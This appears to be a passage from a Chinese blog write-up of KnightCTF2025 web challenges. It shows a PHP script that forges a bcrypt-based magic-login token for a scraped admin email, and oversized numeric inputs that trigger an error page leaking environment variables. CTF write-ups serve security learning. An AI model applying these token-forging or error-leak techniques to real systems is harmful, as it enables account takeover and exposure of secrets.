<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="variable">$email</span> = <span class="string">&quot;admin&quot;</span>; <span class="comment">// 用户邮箱</span></span><br><span class="line"><span class="variable">$time</span> = <span class="title function_ invoke__">time</span>(); <span class="comment">// 当前时间戳</span></span><br><span class="line"><span class="variable">$data</span> = <span class="variable">$email</span> . <span class="string">&quot;|&quot;</span> . <span class="variable">$time</span>; <span class="comment">// 生成数据字符串</span></span><br><span class="line"><span class="variable">$token</span> = <span class="title function_ invoke__">password_hash</span>(<span class="variable">$data</span>, PASSWORD_BCRYPT); <span class="comment">// 生成哈希 token</span></span><br><span class="line"></span><br><span class="line"><span class="variable">$url</span> = <span class="string">&quot;https://kctf2025-knightconnect.knightctf.com&quot;</span>; <span class="comment">// 基础 URL</span></span><br><span class="line"><span class="variable">$loginLink</span> = <span class="variable">$url</span> . <span class="string">&quot;/login-link?token=&quot;</span> . <span class="title function_ invoke__">urlencode</span>(<span class="variable">$token</span>) . </span><br><span class="line">             <span class="string">&quot;&amp;time=&quot;</span> . <span class="variable">$time</span> . </span><br><span class="line">             <span class="string">&quot;&amp;email=&quot;</span> . <span class="title function_ invoke__">urlencode</span>(<span class="variable">$email</span>); <span class="comment">// 生成登录链接</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">echo</span> <span class="variable">$loginLink</span>; <span class="comment">// 输出登录链接</span></span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>这里生成登录链接然后我们再去<code>/contact</code>拿到管理员邮箱</p>
<p><img src="/../images/achieve/2025/1/KnightCTF2025/QQ20250121-192821.jpg" alt="1"></p>
<p>拿到flag</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="variable">$email</span> = <span class="string">&quot;nomanprodhan@knightconnect.com&quot;</span>; <span class="comment">// 用户邮箱</span></span><br><span class="line"><span class="variable">$time</span> = <span class="title function_ invoke__">time</span>(); <span class="comment">// 当前时间戳</span></span><br><span class="line"><span class="variable">$data</span> = <span class="variable">$email</span> . <span class="string">&quot;|&quot;</span> . <span class="variable">$time</span>; <span class="comment">// 生成数据字符串</span></span><br><span class="line"><span class="variable">$token</span> = <span class="title function_ invoke__">password_hash</span>(<span class="variable">$data</span>, PASSWORD_BCRYPT); <span class="comment">// 生成哈希 token</span></span><br><span class="line"></span><br><span class="line"><span class="variable">$url</span> = <span class="string">&quot;https://kctf2025-knightconnect.knightctf.com&quot;</span>; <span class="comment">// 基础 URL</span></span><br><span class="line"><span class="variable">$loginLink</span> = <span class="variable">$url</span> . <span class="string">&quot;/login-link?token=&quot;</span> . <span class="title function_ invoke__">urlencode</span>(<span class="variable">$token</span>) .</span><br><span class="line">    <span class="string">&quot;&amp;time=&quot;</span> . <span class="variable">$time</span> .</span><br><span class="line">    <span class="string">&quot;&amp;email=&quot;</span> . <span class="title function_ invoke__">urlencode</span>(<span class="variable">$email</span>); <span class="comment">// 生成登录链接</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">echo</span> <span class="variable">$loginLink</span>; <span class="comment">// 输出登录链接</span></span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<h2 id="Exceeding-Knight"><a href="#Exceeding-Knight" class="headerlink" title="Exceeding Knight"></a>Exceeding Knight</h2><p><img src="/../images/achieve/2025/1/KnightCTF2025/QQ20250121-215746.jpg" alt="1"></p>
<p>这个路由进行了重写，然后再找有异常的地方发现是直接给打印环境变量出来了</p>
<p><img src="/../images/achieve/2025/1/KnightCTF2025/QQ20250121-220623.jpg" alt="1"></p>
<p>那么我们就找如何报错即可</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">20000000000000000000</span><br><span class="line">200000000000000000000</span><br><span class="line">Addition</span><br></pre></td></tr></table></figure>

<p><img src="/../images/achieve/2025/1/KnightCTF2025/QQ20250121-222128.jpg" alt="1"></p>

  </div>
</article>



    <div class="blog-post-comments">
        <div id="waline_thread"></div>
    </div>


        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
        
          <li><a href="/">h0me</a></li>
        
          <li><a href="/about/">Aβout</a></li>
        
          <li><a href="/tags/">Topi3s</a></li>
        
          <li><a href="/categories/">Cat4gory</a></li>
        
          <li><a href="/links/">Li^ks</a></li>
        
          <li><a href="/search/">Seαrch</a></li>
        
      </ul>
    </div>

    
    
      <div id="toc-footer" style="display: none">
        <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#Knight%E2%80%99s-Secret"><span class="toc-number">1.</span> <span class="toc-text">Knight’s Secret</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#KnightCal"><span class="toc-number">2.</span> <span class="toc-text">KnightCal</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Luana"><span class="toc-number">3.</span> <span class="toc-text">Luana</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Baby-Injection"><span class="toc-number">4.</span> <span class="toc-text">Baby Injection</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Admin-Access"><span class="toc-number">5.</span> <span class="toc-text">Admin Access</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Knight-Connect"><span class="toc-number">6.</span> <span class="toc-text">Knight Connect</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Exceeding-Knight"><span class="toc-number">7.</span> <span class="toc-text">Exceeding Knight</span></a></li></ol>
      </div>
    

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=https://baozongwi.xyz/2025/01/21/KnightCTF2025/"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=https://baozongwi.xyz/2025/01/21/KnightCTF2025/&text=KnightCTF2025(AK)"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=https://baozongwi.xyz/2025/01/21/KnightCTF2025/&title=KnightCTF2025(AK)"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=https://baozongwi.xyz/2025/01/21/KnightCTF2025/&is_video=false&description=KnightCTF2025(AK)"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=KnightCTF2025(AK)&body=Check out this article: https://baozongwi.xyz/2025/01/21/KnightCTF2025/"><i class="fa-solid fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=https://baozongwi.xyz/2025/01/21/KnightCTF2025/&title=KnightCTF2025(AK)"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=https://baozongwi.xyz/2025/01/21/KnightCTF2025/&title=KnightCTF2025(AK)"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=https://baozongwi.xyz/2025/01/21/KnightCTF2025/&title=KnightCTF2025(AK)"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=https://baozongwi.xyz/2025/01/21/KnightCTF2025/&title=KnightCTF2025(AK)"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=https://baozongwi.xyz/2025/01/21/KnightCTF2025/&name=KnightCTF2025(AK)&description="><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=https://baozongwi.xyz/2025/01/21/KnightCTF2025/&t=KnightCTF2025(AK)"><i class="fab fa-hacker-news fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fa-solid fa-bars fa-lg" aria-hidden="true"></i> Menu</a>
        
          <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fa-solid fa-list fa-lg" aria-hidden="true"></i> TOC</a>
        
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fa-solid fa-share-alt fa-lg" aria-hidden="true"></i> Share</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up fa-lg" aria-hidden="true"></i> Top</a>
    </div>

  </div>
</div>

        
        
<footer id="footer">
    <div class="footer-left">
        Copyright ©
        
        
        2024-2025
        baozongwi
        <br>
        <a href="https://beian.miit.gov.cn/" target="_blank">蜀ICP备2024111128号</a>
    </div>
    
    <div class="footer-right">
        <nav>
            <ul>
                <!--
                --><li><a href="/">h0me</a></li><!--
                --><!--
                --><li><a href="/about/">Aβout</a></li><!--
                --><!--
                --><li><a href="/tags/">Topi3s</a></li><!--
                --><!--
                --><li><a href="/categories/">Cat4gory</a></li><!--
                --><!--
                --><li><a href="/links/">Li^ks</a></li><!--
                --><!--
                --><li><a href="/search/">Seαrch</a></li><!--
                -->
            </ul>
            <ul>
                
                <!-- 不蒜子统计 -->
                <span id="busuanzi_container_site_pv">本站总访问量<span id="busuanzi_value_site_pv"></span>次</span>
                <span class="post-meta-divider">|</span>
                <span id="busuanzi_container_site_uv" style='display:none'>本站访客数<span id="busuanzi_value_site_uv"></span>人</span>
                <script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
                
            </ul>
        </nav>
    </div>
</footer>

    </div>
    <!-- styles -->



  <link rel="preload" as="style" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css" crossorigin="anonymous" onload="this.onload=null;this.rel='stylesheet'"/>


    <!-- jquery -->

  <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js" crossorigin="anonymous"></script>




<!-- clipboard -->

  
    <script src="https://cdnjs.cloudflare.com/ajax/libs/clipboard.js/2.0.7/clipboard.min.js" crossorigin="anonymous"></script>
  
  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"Copy to clipboard!\">";
    btn += '<i class="fa-regular fa-clone"></i>';
    btn += '</span>';
    // mount it!
    $(".highlight table").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
      text: function(trigger) {
        return Array.from(trigger.nextElementSibling.querySelectorAll('.code')).reduce((str,it)=>str+it.innerText+'\n','')
      }
    });
    clip.on('success', function(e) {
      e.trigger.setAttribute('aria-label', "Copied!");
      e.clearSelection();
    })
  })
  </script>


<script src="/js/main.js"></script>

<!-- search -->

<!-- Baidu Analytics -->

<!-- Cloudflare Analytics -->

<!-- Disqus Comments -->

<!-- utterances Comments -->

<!-- Waline Comments -->

  <script type="module">
    import { init } from 'https://unpkg.com/@waline/client@v2/dist/waline.mjs';

    var EMOJI = ['//unpkg.com/@waline/emojis@1.2.0/weibo']
    var META = ['nick', 'mail', 'link'];
    var REQUIREDFIELDS = ['nick', 'mail', 'link'];

    var emoji = '//unpkg.com/@waline/emojis@1.2.0/qq'.split(',').filter(function(item){
      return item !== ''; // filter()返回满足不为空item
    });
    emoji = emoji.length == 0 ? EMOJI : emoji;

    var meta = 'nick,mail'.split(',').filter(function(item){
      return META.indexOf(item) > -1; // filter()返回满足META.indexOf(item) > -1为true的item
    });
    meta = meta.length == 0 ? META : meta;

    var requiredFields = 'nick,mail'.split(',').filter(function(item){
      return REQUIREDFIELDS.indexOf(item) > -1; // filter()返回满足META.indexOf(item) > -1为true的item
    });
    requiredFields = requiredFields.length == 0 ? REQUIREDFIELDS : requiredFields;

    init({
      el: '#waline_thread',
      serverURL: 'https://waline.baozongwi.xyz/', // Waline 的服务端地址
      path: '' == '' ? window.location.pathname : '', // 当前文章页路径，用于区分不同的文章页，以保证正确读取该文章页下的评论列表
      lang: 'zh-CN' == '' ? 'zh-CN' : 'zh-CN', // 多语言支持，未设置默认英文
      emoji: emoji,
      dark: 'auto', // 暗黑模式适配
      commentSorting: '' == '' ? 'latest' : '', // 评论列表排序方式
      meta: meta, // 评论者相关属性
      requiredFields: requiredFields, // 设置必填项，默认匿名
      login: '', // 登录模式状态
      wordLimit: '', // 评论字数限制
      pageSize: '10' == '' ? 10 : '10', // 评论列表分页，每页条数
      imageUploader: '', // 自定义图片上传方法
      highlighter: '', // 代码高亮
      locale: {
          placeholder: '你都看到这里了，不说两句就走？这不太好吧', 
          sofa: '這個評論區有點冷₍˄·͈༝·͈˄*₎◞ ̑̑', 
        },
      avatar: 'mp',
      visitor: 'false',
      comment_count: 'false',
    });
  </script>

</body>
</html>
